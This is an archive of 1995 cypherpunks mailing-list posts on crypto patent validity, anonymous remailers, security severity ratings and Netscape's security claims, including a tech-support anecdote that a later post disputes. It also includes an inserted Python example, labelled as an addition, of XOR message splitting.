good English, and fairly calmly described the problem.

It seemed there was a coup attempt in progress at that moment. However, the 
national armoury for that city was kept in the same building as the 
Legislature, and it seems that there was a combination lock on the door to
the armoury. Of the people in the capital city that day, only the Chief of
the Capitol Guard and the Chief Armourer knew the combination to the lock,
and they had already been killed.

So, this officer of the government of Trinidad continued, the problem is 
this. The combination to the lock is stored in a file on the Macintosh, but 
the file has been encrypted with the SuperMac product called Sentinel. Was
there any chance, he asked, that there was a "back door" to the application,
so they could get the combination, open the armoury door, and defend the
Capitol Building and the legitimately elected government of Trinidad against
the insurgents?

All the while he is asking this in a very calm voice, there is the sound of 
gunfire in the background. The Technical Support guy put the person on hold. 
A phone call to the phone company verified that the origin of the call was
in fact Trinidad. 
Meanwhile, there was this mad scramble to see if anybody knew of any "back 
doors" in the Sentinel program.

As it turned out, Sentinel uses DES to encrypt the files, and there was no 
known back door. The Tech Support fellow told the customer that aside from 
trying to guess the password, there was no way through Sentinel, and that
they'd be better off trying to physically destroy the lock.

The official was very polite, thanked him for the effort, and hung up. That 
night, the legitimate government of Trinidad fell. One of the BBC reporters 
mentioned that the casualties seemed heaviest in the capitol, where for some
reason, there seemed to be little return fire from the government forces.

O.K., so they shouldn't have kept the combination in so precarious a 
fashion. But it does place, "I can't see my Microsoft Mail server" 
complaints in a different sort of perspective, does it not?

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 18 Oct 95 12:29:39 PDT
To: cypherpunks@toad.com
Subject: Smoking gun invalidates crypto patent
Message-ID: <199510181928.MAA15260@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Finally!  Free public key crypto!

Rumors have floated for years that the Diffie-Hellman patent is invalid 
because it was disclosed more than a year prior to the patent 
application. But it was never clear if Diffie or Hellman actually 
disclosed (in the legal sense) the invention. It would seem that Roger 
Schlafly has found a "smoking gun."  Through the legal discovery 
process, Schlafly found a copy of the "New Directions..." paper in the 
possession of an IBM researcher (Mike Matyas) with a stamped "received-
by" date more than a year before the patent filing. This copy did not 
have any confidentiality markings or indications of pre-publication 
status.

Since Diffie-Hellman pre-dates Hellman-Merkle (the Knapsack patent), no 
one can assert any infringement of anything for the use of Diffie-
Hellman - it's free.

The real beauty of the patent system is that a patent holder has to 
defend validity no matter how many times it's challenged. So even if 
Schlafly should fail on a technicality, anyone else, an unlimited number 
of times, can challenge this patent again. (Note: One may question 
whether Stanford lied to the patent office about this. That's fraud.)

The following information is a matter of public record, direct from 
Schlafly's motion for summary judgment, dated October 16th, 1995.

----------------------------

3.    Diffie-Hellman is invalid because of a statutory bar.

3.1.  The Diffie-Hellman patent application was filed on Sept. 6, 1977.  
According to 35 USC 102 (b), the patent is invalid and unenforceable if 
there was a public disclosure prior to Sept. 6, 1976.

3.2.  A research paper by Diffie and Hellman, "New Directions in 
Cryptography", IEEE Transactions on Information Theory, vol.  IT-22, no.  
6, Nov. 1976, was submitted on June 3, 1976.  It discloses the secure 
cipher key generator of the Diffie-Hellman patent.  A copy of the paper 
is Am. Compl. Exhibit. U.

3.3.  A survey paper, "The First Ten Years of Public-Key Cryptography", 
was published by Diffie in Proceedings of the IEEE, vol. 76, no. 5, May 
1988. A copy of the paper is Am. Compl. Exhibit. V.  It states on p. 563 
that the Am. Compl. Exhibit. U paper was publicly distributed in June 
1976 and publicly disclosed at the National Computer Conference, also in 
June 1976.  That conference was open to the public, and well-attended by 
experts in the field.

3.4.  A true and correct copy of the "New Directions" preprint dated 
"August 1976" is attached as Exhibit. CA.  It contains a full disclosure of 
the Diffie-Hellman invention.  Schlafly received it from the files of 
Mike Matyas, a cryptographer at IBM, on May 8, 1995.

3.5.  Hellman also lectured on the subject at the 1976 International 
Symposium on Information Theory, Ronneby, Sweden, June 21-24, 1976.

3.6.  The PTO was not informed of these prior art disclosures, as there 
is no record of them in file wrapper.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 18 Oct 95 12:30:12 PDT
To: cypherpunks@toad.com
Subject: Legal argument invalidates Merkle-Hellman
Message-ID: <199510181929.MAA15347@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


More on free public key crypto!

The Hellman-Merkle patent claims to cover the entire notion of public 
key cryptography.  The patent holders say that any scheme which has a 
private key that is computationally infeasible to derive from the public 
key infringes on the Hellman-Merkle patent.  Here is a nice legal 
argument against that position.  It is taken from the public record, 
direct from Roger Schlafly's motion for summary judgment, dated October 
16th, 1995.

Basically, the knapsack algorithm disclosed in the patent does not have 
the claimed property of computational infeasibility, so the patent 
cannot cover any system that does implement the claim.  For example, if 
I submit a patent that claims coverage of all forms of cold-fusion to 
generate power, and disclose an invention that does not work, then those 
general claims are not valid.  Someone who really does invent a workable 
form of cold-fusion gets to make the big patent claims.

----------------------------

4.  Hellman-Merkle is inoperative, hence invalid.

4.1.  The Hellman-Merkle patent discloses a cryptosystem popularly known 
as the "trapdoor Knapsack system", or simply "knapsack".  Ralph Merkle 
is credited with being the principal inventor, and he placed a $100 bet 
that it is secure.  Being "secure" makes it useful for communications or 
authentication.

4.2.  Time Magazine reported on Oct. 25, 1982 that the trapdoor knapsack 
had been broken, i.e., found to be not secure.  Merkle had to pay off 
the $100 bet.  In patent jargon, the best mode was shown to be 
inoperative.  The article is attached as Exhibit. CB.

4.3.  Apparently unhappy with the article, but not denying his $100 
payoff, Merkle wrote a letter to Time Magazine, published in the Nov. 
15, 1982 issue and attached as Exhibit. CC.  In this letter, he offered 
$1000 to anyone who could break the "multiple iteration knapsack" 
system.  That system was the only alternate mode disclosed in Hellman-
Merkle which was not shown inoperative by the work described in Time.  
Merkle recommended using two or three iterations.

4.4.  Two years later, Merkle had to pay the $1000 to Ernie Brickell who 
broke the Hellman-Merkle trapdoor knapsack scheme with up to 40 
iterations.  The Diffie survey article cited above (Am. Compl. Exhibit. 
V) documents on p. 565-566 the failure of the Hellman-Merkle invention.  
(Note that Exhibit. CI recommends this Diffie article.)  One of 
Brickell's articles on the subject, published as part of the proceedings 
of Crypto '84, is attached as Exhibit. CK.

4.5.  Note that Exhibit. CD, a paper in the Communications of the ACM, a 
leading computer science journal, has an editor's comment that "the 
trapdoor Knapsack systems have been broken".  This is a direct reference 
to Hellman-Merkle being inoperative.

4.6.  The Hellman-Merkle patent is invalid and unenforceable because it 
is inoperative as disclosed.  Claims 1-6 and 14-17 require a quantity 
computationally infeasible to generate from a public key.  Claims 1-3 
and 6-17 require secure communication over an insecure channel.  There 
are no other claims.  As documented above, it turned out to be feasible 
to compute the secret key from the public key.  It follows that the 
claimed computational infeasibility is not achieved, and the 
communication is not secure.

4.7.  PKP partners RSADSI and Cylink have known the Hellman-Merkle 
invention to be worthless since at least 1985,  and have not used it in 
their commercial products.

4.8.  As further proof of the failure of Hellman-Merkle, PKP is refusing 
to allow it to be used to protect their own trade secrets.  There was a 
motion before the Court which hinged on this issue.  In PKP's Reply 
Memorandum, PKP argues that protecting its trade secrets with Hellman-
Merkle is tantamount to putting them in the public domain.  Schlafly 
interprets this refusal as an admission that Hellman-Merkle is not 
secure.

4.9.  The Hellman-Merkle invention is not useful because of the flaws 
explained above, and therefore fails to satisfy the 35 USC 101 
requirements for patent protection.

4.10.  In the alternative, Schlafly argues that Hellman-Merkle is 
invalid for reasons of nonstatutory subject matter.  See arguments 
pertaining to the RSA patent below.  Hellman-Merkle discloses more 
hardware than RSA, but none of it is novel, and all of the RSA arguments 
apply.  The trapdoor knapsack system is described in Exhibit. CE, a 
Scientific American article by Hellman.  It is readily seen to consist 
purely of mathematical formulas.

4.11.  PKP may argue that the Hellman-Merkle claims are broader than the 
disclosed embodiments, and therefore the patent is valid in spite of the 
failure of the embodiments.  This notion is absurd, and incorrect as a 
matter of law.  Abstract concepts and ideas cannot be patented at all, 
and certainly not with an inoperative disclosure.

4.12.  In addition, there is prior art on those abstract concepts.  See 
the conference abstracts submitted by Diffie (Exhibit. CG) and Hellman 
(Exhibit. CH).  These were published in June 1976.

4.13.  In the Hellman-Merkle file history, the inventors argue that they 
are entitled to broad patent claims because earlier embodiments of 
public key cryptosystems in the prior art were impractical.  If their 
invention is impractical, then it is no better than the prior art they 
criticized.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 18 Oct 95 09:39:41 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <9510181554.AA05280@toad.com>
Message-ID: <199510181639.MAA01815@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Eli Brandt writes:
> A cause of this is that the last remailer is the only agent in a
> position to see the message before delivery, so it can be argued that
> it should take responsibility for the decision to deliver.  If you
> split the message into shadows, you avoid having anyone in this
> position.  It can then be argued that nobody should pass along random
> noise from unknown parties... you can't solve political problems with
> technology, but you can make the politics increasingly absurd.

As I mentioned in a reply to Modemac I just sent, the recipient's MDA in this
scheme reassembles the shadows/fragments into the intended message. So it
would only be possible to send anonymous mail to recipients who have Message
Gluing Agents on their accounts. 

I posit that such people are likely to be anonymity-friendly, and thus 
unlikely to complain vociferously about any anonymous mail they receive.
This protocol generally could not be used to send anonymous mail to public 
fora -- mailing lists, newsgroups, etc. -- except some freewheeling places
like cypherpunks which don't object to conventional anonymized mail anyway.

However, I foresee a slight possibility that a split delivery scheme like
this could fall into favor in some circles as a compromise <ahem> "solution".
The requirement that the recipient take an active role in accepting anonymous
mail could reduce the traditional spam/harassment complaints to a minimal
level.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 18 Oct 95 12:46:03 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510181839.LAA07648@jobe.shell.portal.com>
Message-ID: <199510181940.MAA10771@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Would you please stop posting your shit to this list? I'd
rather not add all anonymous posters to my killfile, but maybe it is
necessary.
	At least get an account on alpha.c2.org so I can killfile you
and no one else, please. Thank you. (http://alpha.c2.org/)

> 
> Alice de 'nonymous ...
> 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 18 Oct 95 12:52:37 PDT
To: sameer@c2.org
Subject: Re: Postscript in Netscape
Message-ID: <9510181948.AA08965@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: sameer <sameer@c2.org>
> 
> 	In any case, it might be wise for Jeff to get a non-netscape
> account to do his cypherpunks posting from, so as to avoid
> confusion. (ObPlug: Community ConneXion offers mailboxes for just
> $5/month -- shell accounts for $7.50 ;-)

Oh that would be silly now wouldn't it?  If Jeff wants another account
that's his business, but people don't normally expect that you're a
spokesman for a company just because you work there.  Jeff even has,
like most of us, a disclaimer in his sig saying he doesn't speak for
the company.  Anyone that assumes otherwise is surely a newbie to the
net, and just like most bizarre assumptions that newbies make we'll
gently correct them, and they'll learn.

Patrick

p.s. was sameer's post a spam?  <snicker;>  Please don't take this line
     seriously, it was said with tongue definitely in cheek.
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 18 Oct 95 09:55:59 PDT
To: cypherpunks@toad.com
Subject: Re: I want to learn!
Message-ID: <199510181655.MAA10669@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Wed Oct 18 12:55:39 1995


In article <199510181437.HAA00477@jobe.shell.portal.com> anonymous-remailer@shell.portal.com writes:

>  Date: Wed, 18 Oct 1995 07:37:30 -0700
>  
>  >>From: VINCENT810@aol.com
>  >>Can someone please show me the ropes on becoming a cypherpunk!!!! Thanxs.
>  >     Me Too, I'm catching on but some help would help !
>  >     Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu
>  
>  Okay, places to start.
>  
>  Go to the cypherpunks ftp site ftp.csua.berkeley.edu/pub/cypherpunks
>  and look around.  TCMay's "Cyphernomicon" FAQ is a must, although
>  it's really really big.  It's been Weblinked somewhere, but I
>  fail to recall. 

relevant sites:

	Home:           ftp://ftp.csua.berkeley.edu/pub/cypherpunks/Home.html
	Archives:       http://www.hks.net/cpunks/index.html				  
	Cyphernomicon:  http://www.oberlin.edu/~brchkind/cyphernomicon/


-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Auto-signed by mail-secure.el 1.006 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 10:08:41 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <Pine.3.89.9510181314.C103772-0100000@aix2>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 18 Oct 1995, Hal wrote:

> Modemac proposes sending messages to remailers via newsgroup postings.
> 
A fair amount of alt.test postings seem to be pgp'd (though a lot were
Detweiler Blacknet tentacles, not that I've checked since Tim's Blacknet key 
was factored). There was also an alt.anonymous.messages or something 
along those lines. Bad propagation.

It seems to me that receiving messages through newsgroups (sent through 
remailernet) and having them retrieved automatically by your newsreader
might be a better method of defeating traffic analysis. Sounds like Vinge's
piece in True Names about downloading the entire world bbs. All you'd need
to do here would be to scan your local feed of alt.test .

While this would work in the short run, with a low level of users, in a 
high usage scenario, you'd post a destinated pseudonym (you might want it 
encrypted) in alt.test along with the name of the specific newsgroup the 
actual message would be posted to. Saves computing power.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 17 Oct 95 20:17:05 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: proposal: "security spectrum scale" (SSS)
In-Reply-To: <199510131841.LAA17086@netcom9.netcom.com>
Message-ID: <199510180313.NAA26276@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:

...
> to aid this serious problem, I propose the creation of a 
> UNIFIED SECURITY SPECTRUM RANKING.

Good idea - if you can pull it off. If you can't, you will create
even more confusion. That is a decision only your conscience can make.

> this would be a list of all the different types of security weaknesses
> a system can have, and their LEVEL OF SEVERITY. it would attempt to 
> rank every type of security breach possible. then, when a new
> security weakness is discovered, it could be ranked A1 or B5 or C6
...

I wouldn't use <letter><number> because that could be confused with
Orange Book security ratings. The RISKS are obvious, as they say.

...
> another idea behind the rating: it might be a sort of matrix format,
> such as "a-6-alpha" where each of the elements indicates some kind
> of independent factor. for example the "a" might mean "client side",
...

If you want multi-axis, perhaps something like the Geek code, except
standardized so that severity is apparent even if you don't remember
the letters?

(Eg in the Geek Code "+" is usually good but many people wouldn't look
well on d++ or w+++++ (conservative dress and Bill Gates resp.). You
would want "+" to always be good, for example.)

You also want it fairly short (media) - alternatively make it so that
it is possible to say (eg) "A2" or "A2+dx/g8/b*" depending on how much
detail you want (column space).

...
> I don't really consider myself the best 
> qualified in terms of experience but sometimes if you want something done, you
> have to do it yourself.

A.k.a. "cypherpunks write code".

...
> another neat perq: if the cypherpunks come up with a good scale, it
> could be a tremendous positive publicity tool. "today experts discovered
> a bug in -x- that rated a -y- on the CSSS (Cypherpunk Security Spectrum Scale)"

What's wrong with "a bug in -x- that rated -y- on the Cypherpunk Scale"?
There's already TDM TLAs (that's "too damn many three letter acronyms").


Then williams@va.arca.com (Jeff Williams) responded:
...
> Unfortunately, severity is a question of perspective.  In some
> environments, an operating system crash could be considered catastrophic.
> In others, it just means reboot and continue.  I'm not a policy wonk,
> but security is relative to what you care about.

That doesn't rule out a scale: it merely changes how you perceive the
scale.

An earthquake 3.6 on the Richter scale would be no problem if you are
playing poker, say, but "catastrophic" if you are playing mikado.

It also depends on the "Operating System" (building) you are in.

> > to aid this serious problem, I propose the creation of a 
> > UNIFIED SECURITY SPECTRUM RANKING.
> 
> There already was a USSR, but I think it ultimately failed :-}

I wouldn't exactly say Soyuz failed; I'd say the main problem was that
they got a leader with a conscience... And you can't have a totalitarian
dictator with a conscience (as you can see).

...
> > bug that was recently discovered (say, the recent netscape bugs)
> > was, say, not really as potentially severe as the Morris worm.
> 
> To whom?

I would suspect the best answer is "to the general public" or "to the
average user".

If you are not an average user, you reinterpret the rankings to your
liking, making sure that you get more information on those that are
potentially severe to you. It'll still help you by giving you a 
preliminary ranking.

...
> The only way to unify security rankings is to constrain the problem by
> assuming an environment and intended uses for the system.  It sounds
> like you are assuming a low assurance workstation with an internet
> connection which is used for non-critical home or business purposes.

No, that is not necessary. Just like you can say an earthquake measures
3.6 on the Richter scale without making any statements about whether
or not it is "severe".

...
> Any flaw rating system needs to consider how it will deal with advancing
> protection technology.  For example, susceptibility to viruses is much less
...

Not really, you don't need to change the Richter scale just because
buildings have got more solid. The perception of the scale needs to
change, but not the scale itself.

> Also, how do you rate situations where flaws are combined to mount an attack?
...

Then you are asking not for a rating of individual bugs, but overall
bugginess of a product. That can be rated on the same scale or a different
one, but it is a different question.

("A bug discovered in -x- rating -y-, raising the overall bugginess
of -x- to -z-. Film at 10.9959268374")

Then "Vladimir Z. Nuri" <vznuri@netcom.com> responded:
...
> the security rating would not be particularly useful to security experts,
> other than giving a rough idea of the potential severity of the problem.
...

Yup, or if you have long and short versions the long could actually
contain some more useful info.

...
> if something is not done to help convey accurate information,
> a void occurs and potentially "urban myths" 
> such as "the internet steals your credit cards" would tend to 
...

Do we *mind*? "The internet steals your credit cards - download Magic
Money!" :-)


OK, I guess we do mind.

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 18 Oct 95 10:27:17 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Digital Signature Guidelines
In-Reply-To: <30852451.45E4@verity.com>
Message-ID: <Pine.HPP.3.91.951018131857.28279B-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Patrick Horgan wrote:

> It seems that your embedded viewer doesn't want to work on my
> UNIX box.  It makes it quite hard to comment on your
> guidelines.  Apparently, from the way you're presenting this you
> have no real desire to get any industry consensus.  Perhaps you
> only want people that use Windows to have an opportunity to comment.
> Mac users and Unix users not welcome.  I find the whole need to 
> have yet another viewer annoying.  Haven't you guys heard of 
> industry standards?
> 
I had the same annoying experience.  But then I remembered. It's supposed
to be that way. They're $%#*& lawyers. :-(  A Pox on their proposal!


I'd tell you the one about the dead snake and the dead lawyer in the 
middle of the road, but you've probably already heard it. ;-)

Also Annoyed,

-arc
Arley Carter
Tradewinds Technologies, Inc
email: ac@hawk.twinds.com
www: http://www.twinds.com 

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

> Annoyed,
> 
> Patrick J. Horgan
> -- 
>    _______________________________________________________________________
>   /  These opinions are mine, and not Verity's (except by coincidence;).  \
>  |                                                       (\                |
>  |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
>  |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
>  |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
>  |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
>   \___________________________________________________________\)__________/
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (kelso)
Date: Wed, 18 Oct 95 18:54:13 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510182035.NAA28382@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

One method to take the heat off of the last remailer
in a chain would be to call on our friend the "one
time pad".  A message is split into two equal parts
that only make sense when the two parts are 'xor'ed
together.  The separate parts are then sent through
different paths to the final recipient (or newsgroup).
The reader would have to 'xor' the parts together in
order to read the message.  The remailer could not be
blamed (as the message was unreadable to him).

The drawback is that the message would be unreadable
until both pieces showed up.

This method could also be expanded with two more equal
parts that transform the original two parts into
two different messages unrelated to the original
message.
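
The XOR split described in the message above (and the "shadows" Eli Brandt mentions earlier in the thread), as an added example that is not part of the original post. The function names, the sample message and the decoy texts are constructed for illustration; the split generalizes to any number of parts.

```python
import secrets


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("XOR operands must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def split_message(message: bytes, parts: int = 2) -> list[bytes]:
    """Split message into `parts` pieces that only make sense XORed together.

    All but the last piece are fresh random pads; the last piece is the
    message XORed with every pad. Any subset short of all pieces is
    uniformly random, so no single relay holds readable text.
    """
    if parts < 2:
        raise ValueError("need at least two parts")
    pads = [secrets.token_bytes(len(message)) for _ in range(parts - 1)]
    final = message
    for pad in pads:
        final = xor_bytes(final, pad)
    return pads + [final]


def join_parts(parts: list[bytes]) -> bytes:
    """Recipient side: XOR every piece together to recover the message."""
    if len(parts) < 2:
        raise ValueError("need at least two parts")
    result = parts[0]
    for part in parts[1:]:
        result = xor_bytes(result, part)
    return result


def cover_part(part: bytes, decoy: bytes) -> bytes:
    """The 'two more equal parts' extension: build a companion piece that
    turns `part` into an unrelated decoy message when XORed with it."""
    if len(decoy) > len(part):
        raise ValueError("decoy must not be longer than the part")
    return xor_bytes(part, decoy.ljust(len(part), b" "))


# Constructed sample data for the demonstration.
MESSAGE = b"Constructed sample text for the split-delivery demo."
DECOY_A = b"Lunch is at noon on Friday."
DECOY_B = b"Please return the library books."

if __name__ == "__main__":
    part_a, part_b = split_message(MESSAGE)
    print("part A alone :", part_a.hex())
    print("part B alone :", part_b.hex())
    print("A xor B      :", join_parts([part_a, part_b]))
    # Each part can also be paired with a cover piece that yields a decoy.
    print("A xor coverA :", xor_bytes(part_a, cover_part(part_a, DECOY_A)))
    print("B xor coverB :", xor_bytes(part_b, cover_part(part_b, DECOY_B)))
```

Because a companion piece exists for every possible text of the same length, holding one part says nothing about which message it belongs to; the drawback the post names also shows up here, since `join_parts` needs every piece.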




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Wed, 18 Oct 95 05:43:06 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181156.AA11525@all.net>
Message-ID: <199510181242.NAA26611@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
>be secure - regardless of the user's use of their product.  Otherwise,
>the ads should read:
>
	By that rule, it should instead say: "Netscape is only secure if
"you use it in a physically secure computer, only accessible to the person
"using it, with an absolutely secure OS, configured for maximum security,
"totally bug-free, using a network connection that only spans trusted hosts
"with absolute security levels at least as astringent as that of origin,
"that can in no way whatsoever be tapped or otherwise tampered with,
"and to which only persons of absolute trust (if that thing exists) for
"the original user have access. And that only if God doesn't decide to
"make a miracle to break the security or a quantic effect doesn't suddenly
"materialize some kind of horrible and unknown monster from another dimension
"with evil intentions against that specific user of Netscape and power
"enough to break his/her tight security ring! Oh, and provided the user doesn't
"suddenly become mad and etc, etc, etc..." You could go on forever.

	Look, the truth is that no matter how you put it, there is always
a weakest link which is the human factor. The most you can say is that any
method -cryptographic or not- is as secure as the weakest link in the whole
environment in which it is used.

	That stated, the farther you can go is to guarantee only the security
of *your* crypto -or whatever- method and only as far as commonly accepted
wisdom and knowledge allow you to do so. You can't be sure there is no
one there who knows how to factor big numbers, and is keeping silent and
becoming very rich breaking into other people's information.

	I think it is fair if anybody says that their product -or crypto-
method, considered isolatedly, has a given level of "accepted" strength. With
that in their hand any minimally intelligent user should be able to evaluate
the security of his/her own setup given all the -infinite- things that can
go wrong and his/her personal trust on mankind.

	Otherwise it would be like asking car makers to give you a detailed
listing of the relative resistance of all the materials in the car against
any possible other matter in the Universe into which you could possibly
crash. Imagine it: The new XXXX is safe to drive as long as you don't crash
into a truck, concrete wall, jump over a cliff, submerge into deep ocean,
or a nuclear bomb doesn't explode over your head...!

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 11:11:00 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510181314.C103772-0100000@aix2>
Message-ID: <Pine.3.89.9510181440.A93842-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995 I wrote:

> It seems to me that receiving messages through newsgroups (sent through 
> remailernet) and having them retrieved automatically by your newsreader
> might be a better method of defeating traffic analysis. Sounds like Vinge's

Nah. I'll take it back. Send encrypted through usenet, receive 
encrypted through usenet. Best of both, but very slow and only good for 
voluntary mail reception. You could also have an agent doing this 
scanning for msgs and posting unencrypted (or send mail to an  
unwitting spam victim). While it protects all but the last mailer almost 
completely, it's far slower than remailernet and only protects against 
traffic analysis.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blob@apple.com (Brian Bechtel)
Date: Wed, 18 Oct 95 14:17:05 PDT
To: Chris Claborne <cypherpunks@toad.com
Subject: Re: Tales from Tech Support
Message-ID: <v02130501acab1ec2cb11@[17.255.31.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:24 PM 10/18/95, Chris Claborne wrote:
>This is just one of the incredible "Tales from Tech Support" you can find on
>web page:
>http://128.218.7.140/auricular/homepage/tstales/tstales7.html
[...]
>Some poor SuperMac TechSport got a call from some middle level
>official...from the legitimate government of Trinidad.

[long story deleted]

Nice story, but the Republic of Trinidad and Tobago haven't had a coup since
1990, and that coup attempt was unsuccessful.  There was some tension in
Trinidad and Tobago last summer due to the speaker of the house refusing to
step down over some parliamentary issues, but it hasn't escalated into a
coup (yet).

If this happened, it happened in 1990.  But even then, the legitimate
government didn't fall.  Several key buildings were occupied by rebels for
a couple of weeks, and then the rebels surrendered and were pardoned to
great public outrage.

--Brian Bechtel, who shouldn't know so much about the Caribbean...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 18 Oct 95 11:16:26 PDT
To: "Willis H. Ware" <willis@rand.org>
Subject: Re: YOUR chat with Goeff Greiveldinger
In-Reply-To: <199510181703.KAA29941@conrad.rand.org>
Message-ID: <Pine.SUN.3.91.951018141541.15625D@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for the thoughtful note.  I will indeed adjust my semantics to 
make the distinctions you suggest, for I agree that they are important.  
At this writing, I don't know exactly what words I will use, but I will 
strive to make the distinction clear.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 17 Oct 95 21:19:35 PDT
To: jps@monad.semcor.com (Jack P. Starrantino)
Subject: Re: responce to graphic encryption replies
In-Reply-To: <9510140243.AA06608@monad.semcor.com>
Message-ID: <199510180418.OAA26577@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello jps@monad.semcor.com (Jack P. Starrantino)
  and cypherpunks@toad.com
 
JPS wrote:
> > ... The graphic file is going to have a highly correlated 
> > structure, long runs of white space etc. 
> 
> This is not the case for digital imagery. For any given band, if you
> sample a significant portion of the image it would not be surprising to
> see a more or less random distribution over the range.

Even for a picture (as opposed to text fax) you have correlation.
If you do not, you cannot compress it (losslessly).

In general you would want to find the key which leads to least entropy
(ie most compressible file). In other words, find key with minimum
I(key) + I(ciphertext decrypted-by key).

> > The statistics for such a file 
> > would be different than the random distribution you'd get from using the 
> > wrong key. 
> 
> If you decrypt with the wrong key, do you get a random distribution?

Given security thru obscurity, who knows?

> Would this be the case for all wrong keys? Would the statistics change

Given security thru obscurity, who knows?

> in any discernible pattern as the keys got "closer"?

